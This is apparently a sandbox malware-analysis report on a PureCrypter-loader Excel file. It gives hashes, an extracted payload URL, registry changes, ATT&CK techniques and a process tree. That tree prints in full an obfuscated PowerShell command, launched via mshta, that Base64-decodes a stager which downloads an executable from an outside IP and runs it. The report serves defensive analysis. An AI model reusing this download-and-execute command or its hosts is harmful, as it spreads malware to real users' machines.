purecrypter | 524784571b2403c96f0d80401d75a69ef4ce4d6f263966100a4b604b069cab26

Analysis

max time kernel
150s
max time network
154s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
11-06-2024 18:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Magnet Product List Drawing DESIGN.xls
Size

627KB
MD5

40c80e5b61e3f50321933f795b672f61
SHA1

7bea369528e82bac7198de4d2f78fa0fc824cbc5
SHA256

524784571b2403c96f0d80401d75a69ef4ce4d6f263966100a4b604b069cab26
SHA512

7bee2b3acbc25c23a2c4cff02e18203d03c06d75bb29b6120771aa599dfc16c6bbe20a209e4e266be3dd04dbbdbf0480e6181f8cb3683b25b3034e6734705a1e
SSDEEP

12288:JqFzu4L62Ndp4EaPmz1Iyqko/lvBtfRqLBwzirb60RzkE7V7F:Ozu4L62NdSBmzcndfRqqiJzLJ

Score

10^/10

purecrypter downloader loader

Malware Config

Extracted

Family

purecrypter

https://www1.militarydefensenow.com/Bavguvo.dat

Signatures

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
loader downloader purecrypter

Blocklisted process makes network request 4 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	Process
17	1892	mshta.exe
18	1892	mshta.exe
19	1892	mshta.exe
21	1412	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

Processes:

sihost.exe

pid	Process
1888	sihost.exe

Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid	Process
1412	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEmshta.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
1284	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid	Process
1412	powershell.exe
1412	powershell.exe
1412	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exesihost.exe

description	pid	Process
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	1888	sihost.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid	Process
1284	EXCEL.EXE
1284	EXCEL.EXE
1284	EXCEL.EXE
1284	EXCEL.EXE
1284	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

mshta.execmd.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 1892 wrote to memory of 2868	1892	mshta.exe	32
PID 1892 wrote to memory of 2868	1892	mshta.exe	32
PID 1892 wrote to memory of 2868	1892	mshta.exe	32
PID 1892 wrote to memory of 2868	1892	mshta.exe	32
PID 2868 wrote to memory of 1412	2868	cmd.exe	34
PID 2868 wrote to memory of 1412	2868	cmd.exe	34
PID 2868 wrote to memory of 1412	2868	cmd.exe	34
PID 2868 wrote to memory of 1412	2868	cmd.exe	34
PID 1412 wrote to memory of 988	1412	powershell.exe	35
PID 1412 wrote to memory of 988	1412	powershell.exe	35
PID 1412 wrote to memory of 988	1412	powershell.exe	35
PID 1412 wrote to memory of 988	1412	powershell.exe	35
PID 988 wrote to memory of 2072	988	csc.exe	36
PID 988 wrote to memory of 2072	988	csc.exe	36
PID 988 wrote to memory of 2072	988	csc.exe	36
PID 988 wrote to memory of 2072	988	csc.exe	36
PID 1412 wrote to memory of 1888	1412	powershell.exe	38
PID 1412 wrote to memory of 1888	1412	powershell.exe	38
PID 1412 wrote to memory of 1888	1412	powershell.exe	38
PID 1412 wrote to memory of 1888	1412	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Magnet Product List Drawing DESIGN.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1284

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c POweRSHeLl.ExE -eX bYpaSs -nOP -w 1 -c DEvICEcREDentIAlDepLoyMent ; iEx($(Iex('[SySTEM.TEXT.enCodiNG]'+[ChaR]0X3A+[chAr]58+'uTf8.GetsTRINg([sysTem.CONvERT]'+[ChAr]0X3a+[CHAR]58+'frOMbASe64STRInG('+[cHar]0X22+'JHpsNEZhICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUmRFRmluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVWVmZHUmVnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWElRa3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLc05FdFcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmJqcXJzTmlzWWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRnRUF6aENKWlUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpsNEZhOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjcuMjA3LjE2Ni4xNzUvTTEwMDZUL2xzYXNzLmV4ZSIsIiRlTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYXJ0LXNMRWVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chaR]34+'))')))"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POweRSHeLl.ExE -eX bYpaSs -nOP -w 1 -c DEvICEcREDentIAlDepLoyMent ; iEx($(Iex('[SySTEM.TEXT.enCodiNG]'+[ChaR]0X3A+[chAr]58+'uTf8.GetsTRINg([sysTem.CONvERT]'+[ChAr]0X3a+[CHAR]58+'frOMbASe64STRInG('+[cHar]0X22+'JHpsNEZhICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUmRFRmluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVWVmZHUmVnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWElRa3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLc05FdFcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmJqcXJzTmlzWWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRnRUF6aENKWlUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpsNEZhOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjcuMjA3LjE2Ni4xNzUvTTEwMDZUL2xzYXNzLmV4ZSIsIiRlTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYXJ0LXNMRWVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1412
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wde-qtmf.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:988
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0D7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD0D6.tmp"
        5⤵
        
        PID:2072
  - - C:\Users\Admin\AppData\Roaming\sihost.exe
      "C:\Users\Admin\AppData\Roaming\sihost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61

Filesize
299B

MD5
5ae8478af8dd6eec7ad4edf162dd3df1

SHA1
55670b9fd39da59a9d7d0bb0aecb52324cbacc5a

SHA256
fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca

SHA512
a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
989b88635dbbf93599c9266aca1e356a

SHA1
788b5e53117cc7331ec805f456c664ea4a7ffbf2

SHA256
96bef6bb19717ebce4d63174b793ab13a092e7c1d5e34d3e2ff8a7ce299d0e33

SHA512
9029108caecddf3d583fb08df092eaf53374344b02372cdfc45f9697002e314108598a6ccc54f3b267ce0d05307df5ba3bc5a8641354528fb46d2238ada15989

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61

Filesize
192B

MD5
a1fa4a7524b2bd8bdac317976ae0af4b

SHA1
190512f5454c547ece5797a8bfc443e530e44123

SHA256
d5c08f41ce572bb15788d2787646e3e7dd1c80728c482b608ce8f9b4a03c6219

SHA512
